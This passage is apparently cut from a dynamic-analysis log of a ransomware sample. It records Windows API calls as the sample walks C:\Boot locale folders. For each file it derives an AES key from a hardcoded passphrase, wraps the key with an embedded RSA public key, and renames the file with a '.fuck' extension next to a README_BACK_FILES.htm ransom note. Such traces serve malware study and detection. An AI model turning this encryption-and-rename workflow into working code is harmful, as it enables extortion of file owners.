dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.543] CryptDeriveKey (in: hProv=0x276b5e0, Algid=0x6610, hBaseData=0x2716928, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716968) returned 1 [0231.543] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.543] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.543] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276b228) returned 1 [0231.543] CryptImportPublicKeyInfo (in: hCryptProv=0x276b228, dwCertEncodingType=0x1, pInfo=0x277bb20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277bb50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277bb58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2716d28) returned 1 [0231.543] CryptEncrypt (in: hKey=0x2716d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.543] CryptEncrypt (in: hKey=0x2716d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276ae70*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276ae70*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.543] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276ae70, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.543] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2717780, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.543] CryptEncrypt (in: hKey=0x2716968, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.544] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.544] CloseHandle (hObject=0xffffffff) returned 1 [0231.544] CloseHandle (hObject=0xffffffff) returned 1 [0231.544] CopyFileA (lpExistingFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.544] SetFileAttributesA (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.544] DeleteFileA (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.gsg")) returned 0 [0231.544] MoveFileA (lpExistingFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.fuck")) returned 0 [0231.544] CryptDestroyHash (hHash=0x2716928) returned 1 [0231.544] CryptDestroyKey (hKey=0x2716968) returned 1 [0231.544] CryptReleaseContext (hProv=0x276b5e0, dwFlags=0x0) returned 1 [0231.545] FindNextFileA (in: hFindFile=0x27168e8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.545] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.546] GetLastError () returned 0x5 [0231.546] GetFileAttributesA (lpFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui")) returned 0x20 [0231.546] SetFileAttributesA (lpFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.546] CreateFileA (lpFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.546] CreateFileA (lpFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\it-it\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.546] SetFileAttributesA (lpFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.547] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b5e0) returned 1 [0231.548] CryptCreateHash (in: hProv=0x276b5e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.548] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.548] CryptHashData (hHash=0x2716ce8, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.548] CryptDeriveKey (in: hProv=0x276b5e0, Algid=0x6610, hBaseData=0x2716ce8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716e68) returned 1 [0231.549] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.549] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.549] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276a3d0) returned 1 [0231.549] CryptImportPublicKeyInfo (in: hCryptProv=0x276a3d0, dwCertEncodingType=0x1, pInfo=0x277c000*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277c030*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277c038*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x27167a8) returned 1 [0231.549] CryptEncrypt (in: hKey=0x27167a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.549] CryptEncrypt (in: hKey=0x27167a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276b2b0*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276b2b0*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.549] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276b2b0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.550] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2717780, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.550] CryptEncrypt (in: hKey=0x2716e68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.550] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.550] CloseHandle (hObject=0xffffffff) returned 1 [0231.550] CloseHandle (hObject=0xffffffff) returned 1 [0231.550] CopyFileA (lpExistingFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\it-it\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.550] SetFileAttributesA (lpFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.550] DeleteFileA (lpFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\it-it\\memtest.exe.mui.gsg")) returned 0 [0231.551] MoveFileA (lpExistingFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\it-IT\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\it-it\\memtest.exe.mui.fuck")) returned 0 [0231.551] CryptDestroyHash (hHash=0x2716ce8) returned 1 [0231.551] CryptDestroyKey (hKey=0x2716e68) returned 1 [0231.551] CryptReleaseContext (hProv=0x276b5e0, dwFlags=0x0) returned 1 [0231.551] FindNextFileA (in: hFindFile=0x27168e8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.551] FindNextFileA (in: hFindFile=0x27168e8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.551] FindClose (in: hFindFile=0x27168e8 | out: hFindFile=0x27168e8) returned 1 [0231.551] GetFileAttributesA (lpFileName="C:\\\\Boot\\it-IT\\README_BACK_FILES.htm" (normalized: "c:\\boot\\it-it\\readme_back_files.htm")) returned 0x20 [0231.551] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.551] FindFirstFileA (in: lpFileName="C:\\\\Boot\\ja-JP\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716da8 [0231.553] FindNextFileA (in: hFindFile=0x2716da8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.553] FindNextFileA (in: hFindFile=0x2716da8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.553] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.553] GetLastError () returned 0x12 [0231.553] GetFileAttributesA (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui")) returned 0x20 [0231.554] SetFileAttributesA (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.554] CreateFileA (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.554] CreateFileA (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.554] SetFileAttributesA (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.554] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b5e0) returned 1 [0231.556] CryptCreateHash (in: hProv=0x276b5e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.556] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.556] CryptHashData (hHash=0x2716ca8, pbData=0x2ec6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.556] CryptDeriveKey (in: hProv=0x276b5e0, Algid=0x6610, hBaseData=0x2716ca8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716ae8) returned 1 [0231.557] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.557] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.557] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276a920) returned 1 [0231.557] CryptImportPublicKeyInfo (in: hCryptProv=0x276a920, dwCertEncodingType=0x1, pInfo=0x277bbf0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277bc20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277bc28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2716a68) returned 1 [0231.557] CryptEncrypt (in: hKey=0x2716a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.557] CryptEncrypt (in: hKey=0x2716a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276ac50*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276ac50*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.557] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276ac50, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.558] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2717780, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.558] CryptEncrypt (in: hKey=0x2716ae8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.558] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.558] CloseHandle (hObject=0xffffffff) returned 1 [0231.558] CloseHandle (hObject=0xffffffff) returned 1 [0231.558] CopyFileA (lpExistingFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.558] SetFileAttributesA (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.558] DeleteFileA (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.gsg")) returned 0 [0231.558] MoveFileA (lpExistingFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.fuck")) returned 0 [0231.559] CryptDestroyHash (hHash=0x2716ca8) returned 1 [0231.559] CryptDestroyKey (hKey=0x2716ae8) returned 1 [0231.559] CryptReleaseContext (hProv=0x276b5e0, dwFlags=0x0) returned 1 [0231.559] FindNextFileA (in: hFindFile=0x2716da8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.559] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.559] GetLastError () returned 0x5 [0231.559] GetFileAttributesA (lpFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui")) returned 0x20 [0231.559] SetFileAttributesA (lpFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.559] CreateFileA (lpFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.559] CreateFileA (lpFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.560] SetFileAttributesA (lpFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.560] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b5e0) returned 1 [0231.562] CryptCreateHash (in: hProv=0x276b5e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.562] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.562] CryptHashData (hHash=0x2716be8, pbData=0x2eca30, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.562] CryptDeriveKey (in: hProv=0x276b5e0, Algid=0x6610, hBaseData=0x2716be8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716ae8) returned 1 [0231.562] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.562] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.562] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276a348) returned 1 [0231.562] CryptImportPublicKeyInfo (in: hCryptProv=0x276a348, dwCertEncodingType=0x1, pInfo=0x277c0d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277c100*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277c108*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2716d68) returned 1 [0231.562] CryptEncrypt (in: hKey=0x2716d68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.563] CryptEncrypt (in: hKey=0x2716d68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276aab8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276aab8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.563] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276aab8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.563] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2717780, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.563] CryptEncrypt (in: hKey=0x2716ae8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.563] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.563] CloseHandle (hObject=0xffffffff) returned 1 [0231.563] CloseHandle (hObject=0xffffffff) returned 1 [0231.563] CopyFileA (lpExistingFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.563] SetFileAttributesA (lpFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.563] DeleteFileA (lpFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui.gsg")) returned 0 [0231.564] MoveFileA (lpExistingFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui.fuck")) returned 0 [0231.564] CryptDestroyHash (hHash=0x2716be8) returned 1 [0231.564] CryptDestroyKey (hKey=0x2716ae8) returned 1 [0231.564] CryptReleaseContext (hProv=0x276b5e0, dwFlags=0x0) returned 1 [0231.564] FindNextFileA (in: hFindFile=0x2716da8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.564] FindNextFileA (in: hFindFile=0x2716da8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.564] FindClose (in: hFindFile=0x2716da8 | out: hFindFile=0x2716da8) returned 1 [0231.564] GetFileAttributesA (lpFileName="C:\\\\Boot\\ja-JP\\README_BACK_FILES.htm" (normalized: "c:\\boot\\ja-jp\\readme_back_files.htm")) returned 0x20 [0231.564] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.565] FindFirstFileA (in: lpFileName="C:\\\\Boot\\ko-KR\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716968 [0231.566] FindNextFileA (in: hFindFile=0x2716968, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.566] FindNextFileA (in: hFindFile=0x2716968, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.566] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.566] GetLastError () returned 0x12 [0231.566] GetFileAttributesA (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui")) returned 0x20 [0231.567] SetFileAttributesA (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.567] CreateFileA (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.567] CreateFileA (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.567] SetFileAttributesA (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.568] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, 